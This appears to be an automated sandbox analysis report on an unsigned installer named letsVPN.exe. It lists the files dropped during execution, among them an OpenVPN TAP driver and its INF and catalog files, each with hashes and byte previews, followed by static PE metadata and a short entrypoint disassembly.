                                                                                                                                                                                                  SHA-512:8C9192FF49C75A050014FB08F922FA1188B0B83877D7D408B1E33B4BB52CD48E480BF83CE743B46E11FDB5CDBB35A1799934BA1BE92DFCC03C9E120116F875EA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:[Device Install Log].. OS Version = 10.0.19045.. Service Pack = 0.0.. Suite = 0x0100.. ProductType = 1.. Architecture = amd64....[BeginLog]....[Boot Session: 2023/10/03 09:57:02.288]....>>> [Setup Import Driver Package - C:\Windows\system32\spool\tools\Microsoft Print To PDF\prnms009.Inf]..>>> Section start 2023/10/03 09:57:37.904.. cmd: C:\Windows\System32\spoolsv.exe.. inf: Provider: Microsoft.. inf: Class GUID: {4D36E979-E325-11CE-BFC1-08002BE10318}.. inf: Driver Version: 06/21/2006,10.0.19041.1806.. inf: Catalog File: prnms009.cat.. ump: Import flags: 0x0000000D.. pol: {Driver package policy check} 09:57:37.920.. pol: {Driver package policy check - exit(0x00000000)} 09:57:37.920.. sto: {Stage Driver Package: C:\Windows\system32\spool\tools\Microsoft Print To PDF\prnms009.Inf} 09:57:37.920.. inf: {Query Configurability: C:\Windows\system32\spool\tools\Microsoft Print To PDF\prnms009.Inf} 09:57:37.920.. inf:

                                                                                                                                                                                                  C:\Windows\Logs\NetSetup\service.0.etl

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):524288
                                                                                                                                                                                                  Entropy (8bit):0.42450821893042967
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:/LvM7mjhRoZO/oAPzImKVYG4cEsu8UDtq9l:jMyoZwImKVYG4cEsu8UDtq9l
                                                                                                                                                                                                  MD5:1DE489CD0112CAF65DE75A4EDD028C69
                                                                                                                                                                                                  SHA1:133C0D45E6DBC65724A8EFBC312198B781E90737
                                                                                                                                                                                                  SHA-256:73CD53B884F67A71ECDFA705A954FD2803B86EEBDAE9701C380F883AB72880FF
                                                                                                                                                                                                  SHA-512:EFE7CDC00C796977D0A1E82E202F931322184C3E356A0B5F3E66DBB63592144B6B1EB5FD5E11B31B29663761F155A66EDEC7DF34772471A112886FB489C59494
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:....8...8.......................................P...!....................................?......................eJ..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.6.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.6.1...........................................................@K5..............?..............N.e.t.C.f.g.T.r.a.c.e...C.:.\.W.i.n.d.o.w.s.\.L.o.g.s.\.N.e.t.S.e.t.u.p.\.s.e.r.v.i.c.e...0...e.t.l.........P.P..........?..................................................................8.B..?......19041.1.amd64fre.vb_release.191206-1406.....4.@..?......].*;..y.q...2......NetSetupApi.pdb..b......7.@..?.......I.[.8+m.!N8$......NetSetupuser.pdb......4.@..?.........>*.....Nr8..a....NetSetupApi.pdb.........4.@..?.........E_iC...F........NetSetupSvc.pdb.............................................................................................................................................................

                                                                                                                                                                                                  C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):55
                                                                                                                                                                                                  Entropy (8bit):4.306461250274409
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                  MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                  SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                  SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                  SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                                                                                                  C:\Windows\System32\DriverStore\Temp\{a1287589-5177-bd45-adb1-516ad4522f2f}\SETB5FE.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\drvinst.exe
                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):7632
                                                                                                                                                                                                  Entropy (8bit):5.063558190257152
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:wr8tW9yCTi3x4vlQd22bjR+iAUC7bMP+io3DcNSj6jvKFkPs7EQTXvt1Ld4Z:LWlGNdkkzo3DcNSj6jvKFkPs7EQTXvtk
                                                                                                                                                                                                  MD5:26009F092BA352C1A64322268B47E0E3
                                                                                                                                                                                                  SHA1:E1B2220CD8DCAEF6F7411A527705BD90A5922099
                                                                                                                                                                                                  SHA-256:150EF8EB07532146F833DC020C02238161043260B8A565C3CFCB2365BAD980D9
                                                                                                                                                                                                  SHA-512:C18111982CA233A7FC5D1E893F9BD8A3ED739756A47651E0638DEBB0704066AF6B25942C7961CDEEDF953A206EB159FE50E0E10055C40B68EB0D22F6064BB363
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:; ****************************************************************************..; * Copyright (C) 2002-2014 OpenVPN Technologies, Inc. *..; * This program is free software; you can redistribute it and/or modify *..; * it under the terms of the GNU General Public License version 2 *..; * as published by the Free Software Foundation. *..; ****************************************************************************....; SYNTAX CHECKER..; cd \WINDDK\3790\tools\chkinf..; chkinf c:\src\openvpn\tap-win32\i386\oemvista.inf..; OUTPUT -> file:///c:/WINDDK/3790/tools/chkinf/htm/c%23+src+openvpn+tap-win32+i386+__OemWin2k.htm....; INSTALL/REMOVE DRIVER..; tapinstall install OemVista.inf tapoas..; tapinstall update OemVista.inf tapoas..; tapinstall remove tapoas....;*********************************************************..; Note to Developers:..;..; If you are bundling the TAP-Windows driver with your app,..; you should try

                                                                                                                                                                                                  C:\Windows\System32\DriverStore\Temp\{a1287589-5177-bd45-adb1-516ad4522f2f}\SETB60F.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\drvinst.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10739
                                                                                                                                                                                                  Entropy (8bit):7.214364446291792
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:JDVLGVDFfap5UEwQl/WGhYCt17vJ4qnaj6jQc:7GCpzlnh3t1x4l2jn
                                                                                                                                                                                                  MD5:F73AC62E8DF97FAF3FC8D83E7F71BF3F
                                                                                                                                                                                                  SHA1:619A6E8F7A9803A4C71F73060649903606BEAF4E
                                                                                                                                                                                                  SHA-256:CC74CDB88C198EB00AEF4CAA20BF1FDA9256917713A916E6B94435CD4DCB7F7B
                                                                                                                                                                                                  SHA-512:F81F5757E0E449AD66A632299BCBE268ED02DF61333A304DCCAFB76B2AD26BAF1A09E7F837762EE4780AFB47D90A09BF07CB5B8B519C6FB231B54FA4FBE17FFE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:0.)...*.H........).0.)....1.0...`.H.e......0..i..+.....7.....Z0..V0...+.....7.......r?.X.M.....F.A..201008141946Z0...+.....7.....0..T0.... .....S!F.3....#.a.2`..e...#e...1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0<..+.....7...1.0,...F.i.l.e........o.e.m.v.i.s.t.a...i.n.f...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... .....S!F.3....#.a.2`..e...#e...0...."~..m..8C. i$.4.l..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0:..+.....7...1,0*...F.i.l.e........t.a.p.0.9.0.1...s.y.s...0.... ..j(.M<.cR..XrT....F..R.]....?1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0:..+.....7...1,0*...F.i.l.e........t.a.p.0.9.0.1...s.y.s...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... ..j(.M<.cR..XrT....F..R.]....?0.....".....A.Rw..... .1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0<..+.....7...1.0,...F.i.l.e........o.e.m.v.i.s.t.a...i.n.f.......0...0....+.

                                                                                                                                                                                                  C:\Windows\System32\DriverStore\Temp\{a1287589-5177-bd45-adb1-516ad4522f2f}\SETB620.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\drvinst.exe
                                                                                                                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):39920
                                                                                                                                                                                                  Entropy (8bit):6.338128217115975
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:XtCuL1O/+AphG3F9NlXt5oZhDzbV104mmuiExsFwQvYp33U35:XdCoTxk1lmmjExsFNvYtk
                                                                                                                                                                                                  MD5:C10CCDEC5D7AF458E726A51BB3CDC732
                                                                                                                                                                                                  SHA1:0553AAB8C2106ABB4120353360D747B0A2B4C94F
                                                                                                                                                                                                  SHA-256:589C5667B1602837205DA8EA8E92FE13F8C36048B293DF931C99B39641052253
                                                                                                                                                                                                  SHA-512:7437C12AE5B31E389DE3053A55996E7A0D30689C6E0D10BDE28F1FBF55CEE42E65AA441B7B82448334E725C0899384DEE2645CE5C311F3A3CFC68E42AD046981
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........~..[...[...[....w..Z....w..^...[...m....w.._....w..^.../t..Q.../t..Z.../t..Z...Rich[...........................PE..d......_.........."......Z.....................@....................................=w....`A....................................................<.......X....p..T....x...#...........R..8............................S...............P...............................text..._>.......@.................. ..h.rdata.......P.......D..............@..H.data........`.......P..............@....pdata..T....p.......R..............@..HPAGE.................V.............. ..`INIT.................d.............. ..b.rsrc...X............p..............@..B.reloc...............v..............@..B................................................................................................................................................................................

                                                                                                                                                                                                  C:\Windows\System32\DriverStore\Temp\{a1287589-5177-bd45-adb1-516ad4522f2f}\oemvista.inf (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\drvinst.exe
                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):7632
                                                                                                                                                                                                  Entropy (8bit):5.063558190257152
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:wr8tW9yCTi3x4vlQd22bjR+iAUC7bMP+io3DcNSj6jvKFkPs7EQTXvt1Ld4Z:LWlGNdkkzo3DcNSj6jvKFkPs7EQTXvtk
                                                                                                                                                                                                  MD5:26009F092BA352C1A64322268B47E0E3
                                                                                                                                                                                                  SHA1:E1B2220CD8DCAEF6F7411A527705BD90A5922099
                                                                                                                                                                                                  SHA-256:150EF8EB07532146F833DC020C02238161043260B8A565C3CFCB2365BAD980D9
                                                                                                                                                                                                  SHA-512:C18111982CA233A7FC5D1E893F9BD8A3ED739756A47651E0638DEBB0704066AF6B25942C7961CDEEDF953A206EB159FE50E0E10055C40B68EB0D22F6064BB363
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:; ****************************************************************************..; * Copyright (C) 2002-2014 OpenVPN Technologies, Inc. *..; * This program is free software; you can redistribute it and/or modify *..; * it under the terms of the GNU General Public License version 2 *..; * as published by the Free Software Foundation. *..; ****************************************************************************....; SYNTAX CHECKER..; cd \WINDDK\3790\tools\chkinf..; chkinf c:\src\openvpn\tap-win32\i386\oemvista.inf..; OUTPUT -> file:///c:/WINDDK/3790/tools/chkinf/htm/c%23+src+openvpn+tap-win32+i386+__OemWin2k.htm....; INSTALL/REMOVE DRIVER..; tapinstall install OemVista.inf tapoas..; tapinstall update OemVista.inf tapoas..; tapinstall remove tapoas....;*********************************************************..; Note to Developers:..;..; If you are bundling the TAP-Windows driver with your app,..; you should try

                                                                                                                                                                                                  C:\Windows\System32\DriverStore\Temp\{a1287589-5177-bd45-adb1-516ad4522f2f}\tap0901.cat (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\drvinst.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10739
                                                                                                                                                                                                  Entropy (8bit):7.214364446291792
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:JDVLGVDFfap5UEwQl/WGhYCt17vJ4qnaj6jQc:7GCpzlnh3t1x4l2jn
                                                                                                                                                                                                  MD5:F73AC62E8DF97FAF3FC8D83E7F71BF3F
                                                                                                                                                                                                  SHA1:619A6E8F7A9803A4C71F73060649903606BEAF4E
                                                                                                                                                                                                  SHA-256:CC74CDB88C198EB00AEF4CAA20BF1FDA9256917713A916E6B94435CD4DCB7F7B
                                                                                                                                                                                                  SHA-512:F81F5757E0E449AD66A632299BCBE268ED02DF61333A304DCCAFB76B2AD26BAF1A09E7F837762EE4780AFB47D90A09BF07CB5B8B519C6FB231B54FA4FBE17FFE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:0.)...*.H........).0.)....1.0...`.H.e......0..i..+.....7.....Z0..V0...+.....7.......r?.X.M.....F.A..201008141946Z0...+.....7.....0..T0.... .....S!F.3....#.a.2`..e...#e...1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0<..+.....7...1.0,...F.i.l.e........o.e.m.v.i.s.t.a...i.n.f...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... .....S!F.3....#.a.2`..e...#e...0...."~..m..8C. i$.4.l..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0:..+.....7...1,0*...F.i.l.e........t.a.p.0.9.0.1...s.y.s...0.... ..j(.M<.cR..XrT....F..R.]....?1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0:..+.....7...1,0*...F.i.l.e........t.a.p.0.9.0.1...s.y.s...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... ..j(.M<.cR..XrT....F..R.]....?0.....".....A.Rw..... .1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0<..+.....7...1.0,...F.i.l.e........o.e.m.v.i.s.t.a...i.n.f.......0...0....+.

                                                                                                                                                                                                  C:\Windows\System32\DriverStore\Temp\{a1287589-5177-bd45-adb1-516ad4522f2f}\tap0901.sys (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\drvinst.exe
                                                                                                                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):39920
                                                                                                                                                                                                  Entropy (8bit):6.338128217115975
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:XtCuL1O/+AphG3F9NlXt5oZhDzbV104mmuiExsFwQvYp33U35:XdCoTxk1lmmjExsFNvYtk
                                                                                                                                                                                                  MD5:C10CCDEC5D7AF458E726A51BB3CDC732
                                                                                                                                                                                                  SHA1:0553AAB8C2106ABB4120353360D747B0A2B4C94F
                                                                                                                                                                                                  SHA-256:589C5667B1602837205DA8EA8E92FE13F8C36048B293DF931C99B39641052253
                                                                                                                                                                                                  SHA-512:7437C12AE5B31E389DE3053A55996E7A0D30689C6E0D10BDE28F1FBF55CEE42E65AA441B7B82448334E725C0899384DEE2645CE5C311F3A3CFC68E42AD046981
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........~..[...[...[....w..Z....w..^...[...m....w.._....w..^.../t..Q.../t..Z.../t..Z...Rich[...........................PE..d......_.........."......Z.....................@....................................=w....`A....................................................<.......X....p..T....x...#...........R..8............................S...............P...............................text..._>.......@.................. ..h.rdata.......P.......D..............@..H.data........`.......P..............@....pdata..T....p.......R..............@..HPAGE.................V.............. ..`INIT.................d.............. ..b.rsrc...X............p..............@..B.reloc...............v..............@..B................................................................................................................................................................................

                                                                                                                                                                                                  C:\Windows\System32\catroot2\dberr.txt

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\drvinst.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                  Size (bytes):3474
                                                                                                                                                                                                  Entropy (8bit):5.365220498844006
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:QO00eO00erMwUgWUg0B1kE3ZhpJp8ZpkRepk3s5pmspmZr:QO00eO00erMwmkB1kAV
                                                                                                                                                                                                  MD5:4A643DB20834F7B72CCDF9D557E9C55D
                                                                                                                                                                                                  SHA1:A1A72CDE327DCBD2CB4B766C74D0DEBF6DD86E8C
                                                                                                                                                                                                  SHA-256:1A0FBE89F1B91E050A45AC5AD7F85AB7FB09817E401A46C8B1C3225390C8A56B
                                                                                                                                                                                                  SHA-512:08DA6DCA777597F9D345962C7D06378DDDA587F475C67E39CB1E1B35002FB6591FD93CC931CCC1CE7D3BEE35158D53CA55559DA009D666DD5844E98888A5A241
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #6041 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #6699 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #4398 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #6041 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #6699 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #4398 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #2083 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #2459 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: SyncAllDBs Corruption or Schema Change..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #891 encountered JET error -1409..CatalogDB: 08:57:12 03/10/2023: catdbsvc.cpp at line #1307 encountered JET error -1601..CatalogDB: 08:57:12 03/10/2023: SyncDB:: Sync sta

                                                                                                                                                                                                  C:\Windows\System32\drivers\SETBDCE.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\drvinst.exe
                                                                                                                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):39920
                                                                                                                                                                                                  Entropy (8bit):6.338128217115975
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:XtCuL1O/+AphG3F9NlXt5oZhDzbV104mmuiExsFwQvYp33U35:XdCoTxk1lmmjExsFNvYtk
                                                                                                                                                                                                  MD5:C10CCDEC5D7AF458E726A51BB3CDC732
                                                                                                                                                                                                  SHA1:0553AAB8C2106ABB4120353360D747B0A2B4C94F
                                                                                                                                                                                                  SHA-256:589C5667B1602837205DA8EA8E92FE13F8C36048B293DF931C99B39641052253
                                                                                                                                                                                                  SHA-512:7437C12AE5B31E389DE3053A55996E7A0D30689C6E0D10BDE28F1FBF55CEE42E65AA441B7B82448334E725C0899384DEE2645CE5C311F3A3CFC68E42AD046981
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........~..[...[...[....w..Z....w..^...[...m....w.._....w..^.../t..Q.../t..Z.../t..Z...Rich[...........................PE..d......_.........."......Z.....................@....................................=w....`A....................................................<.......X....p..T....x...#...........R..8............................S...............P...............................text..._>.......@.................. ..h.rdata.......P.......D..............@..H.data........`.......P..............@....pdata..T....p.......R..............@..HPAGE.................V.............. ..`INIT.................d.............. ..b.rsrc...X............p..............@..B.reloc...............v..............@..B................................................................................................................................................................................

                                                                                                                                                                                                  C:\Windows\System32\drivers\tap0901.sys (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\drvinst.exe
                                                                                                                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):39920
                                                                                                                                                                                                  Entropy (8bit):6.338128217115975
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:XtCuL1O/+AphG3F9NlXt5oZhDzbV104mmuiExsFwQvYp33U35:XdCoTxk1lmmjExsFNvYtk
                                                                                                                                                                                                  MD5:C10CCDEC5D7AF458E726A51BB3CDC732
                                                                                                                                                                                                  SHA1:0553AAB8C2106ABB4120353360D747B0A2B4C94F
                                                                                                                                                                                                  SHA-256:589C5667B1602837205DA8EA8E92FE13F8C36048B293DF931C99B39641052253
                                                                                                                                                                                                  SHA-512:7437C12AE5B31E389DE3053A55996E7A0D30689C6E0D10BDE28F1FBF55CEE42E65AA441B7B82448334E725C0899384DEE2645CE5C311F3A3CFC68E42AD046981
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........~..[...[...[....w..Z....w..^...[...m....w.._....w..^.../t..Q.../t..Z.../t..Z...Rich[...........................PE..d......_.........."......Z.....................@....................................=w....`A....................................................<.......X....p..T....x...#...........R..8............................S...............P...............................text..._>.......@.................. ..h.rdata.......P.......D..............@..H.data........`.......P..............@....pdata..T....p.......R..............@..HPAGE.................V.............. ..`INIT.................d.............. ..b.rsrc...X............p..............@..B.reloc...............v..............@..B................................................................................................................................................................................

                                                                                                                                                                                                  \Device\ConDrv

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):110
                                                                                                                                                                                                  Entropy (8bit):4.644932559633425
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:jBJFELuwVALZgmBcRICkREpAUWnRthLK5a6eCMABAv:jBJolmKR8TRoJPQv
                                                                                                                                                                                                  MD5:446993FC2ADD57076DB96E84A772E2AA
                                                                                                                                                                                                  SHA1:1BF326E1ACD348A2A7BECC02EE8CE36CB8AA2A96
                                                                                                                                                                                                  SHA-256:F804CF528A8BEEB38F3A4FE62BAAB8C90021C6F1E41265E5FEDE6813DF221069
                                                                                                                                                                                                  SHA-512:BAEDDE2E0711A92DC6DA12E018A86BF70C4CF660F6DCE9E55B2807D5C8F4C85F8915C448C0AA74BC0B2E9BA3242F42C2EDBCAF54A80614871D5606917A75542B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:Windows cannot open the file named C:\ProgramData\s1qGS.xml...The system cannot find the file specified.......

                                                                                                                                                                                                  Static File Info

                                                                                                                                                                                                  General

                                                                                                                                                                                                  File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                  Entropy (8bit):7.951733059880656
                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                  • Win64 Executable GUI (202006/5) 77.37%
                                                                                                                                                                                                  • InstallShield setup (43055/19) 16.49%
                                                                                                                                                                                                  • Win64 Executable (generic) (12005/4) 4.60%
                                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.77%
                                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.77%
                                                                                                                                                                                                  File name:letsVPN.exe
                                                                                                                                                                                                  File size:33'128'448 bytes
                                                                                                                                                                                                  MD5:ef0f5b020ea3238a98642cd7b56d84bb
                                                                                                                                                                                                  SHA1:9bfb209e7d43739cc9dea530680b0c4ecdbf5981
                                                                                                                                                                                                  SHA256:abf9a5632221e9fe423c9eeeb4c205497bf5bb1ff4aad8561609d81eaa82976e
                                                                                                                                                                                                  SHA512:cae5d82e433a68f3e1770ed21cd80479f4fa49fea367e0a6b28a8a5743dbc8feb658bc4c1171c514ce957a34a26c49541403745293b51d13a3c4bcaeca79d3e7
                                                                                                                                                                                                  SSDEEP:393216:eKb0lwDQigr/AwoVsxGxbiDDzWzmJ/2inHWazagVdtBrx8wXpZVYcs7:twuEiyoWG0DDzWCgin/tB97YF
                                                                                                                                                                                                  TLSH:74771202E78192F9D86DC035869B2B32F7A0B44A4735AAEB6BD153E50B75FC01E3871D
                                                                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U7..4YJ.4YJ.4YJ:{.J.4YJ..4J.4YJ.."J.4YJ.4XJ.6YJ.L.J.4YJ.L.J.4YJ.L.JG4YJ.L.J.4YJ.f.J.4YJ.L.J.4YJRich.4YJ.......................

                                                                                                                                                                                                  File Icon

                                                                                                                                                                                                  Icon Hash:804ceccc64ece837

                                                                                                                                                                                                  Static PE Info

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Entrypoint:0x140062e64
                                                                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                                                                  Digitally signed:false
                                                                                                                                                                                                  Imagebase:0x140000000
                                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                                                                  Time Stamp:0x6770F00A [Sun Dec 29 06:45:30 2024 UTC]
                                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                                  OS Version Major:5
                                                                                                                                                                                                  OS Version Minor:2
                                                                                                                                                                                                  File Version Major:5
                                                                                                                                                                                                  File Version Minor:2
                                                                                                                                                                                                  Subsystem Version Major:5
                                                                                                                                                                                                  Subsystem Version Minor:2
                                                                                                                                                                                                  Import Hash:edafe69053cd166dc7264345550f7ddd

                                                                                                                                                                                                  Entrypoint Preview

                                                                                                                                                                                                  Instruction
                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                  sub esp, 28h
                                                                                                                                                                                                  call 00007F8308DF2BE4h
                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                  add esp, 28h
                                                                                                                                                                                                  jmp 00007F8308DE9BC7h
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  int3
                                                                                                                                                                                                  nop word ptr [eax+eax+00000000h]
                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                  mov eax, ecx
                                                                                                                                                                                                  dec ecx
                                                                                                                                                                                                  cmp eax, 08h
                                                                                                                                                                                                  jc 00007F8308DE9E05h
                                                                                                                                                                                                  movzx edx, dl
                                                                                                                                                                                                  dec ecx
                                                                                                                                                                                                  mov ecx, 01010101h
                                                                                                                                                                                                  add dword ptr [ecx], eax
                                                                                                                                                                                                  add dword ptr [ecx], eax
                                                                                                                                                                                                  dec ecx
                                                                                                                                                                                                  imul edx, ecx
                                                                                                                                                                                                  dec ecx
                                                                                                                                                                                                  cmp eax, 40h
                                                                                                                                                                                                  jc 00007F8308DE9DD0h
                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                  neg ecx
                                                                                                                                                                                                  and ecx, 07h
                                                                                                                                                                                                  je 00007F8308DE9DB8h
                                                                                                                                                                                                  dec esp
                                                                                                                                                                                                  sub eax, ecx
                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                  mov dword ptr [eax], edx
                                                                                                                                                                                                  dec eax
                                                                                                                                                                                                  add ecx, eax
                                                                                                                                                                                                  dec ebp
                                                                                                                                                                                                  mov ecx, eax
                                                                                                                                                                                                  dec ecx
                                                                                                                                                                                                  and eax, 3Fh
                                                                                                                                                                                                  dec ecx
                                                                                                                                                                                                  shr ecx, 06h
                                                                                                                                                                                                  jne 00007F8308DE9DEBh
                                                                                                                                                                                                  dec ebp
                                                                                                                                                                                                  mov ecx, eax
                                                                                                                                                                                                  dec ecx
                                                                                                                                                                                                  and eax, 07h
                                                                                                                                                                                                  dec ecx
                                                                                                                                                                                                  shr ecx, 03h
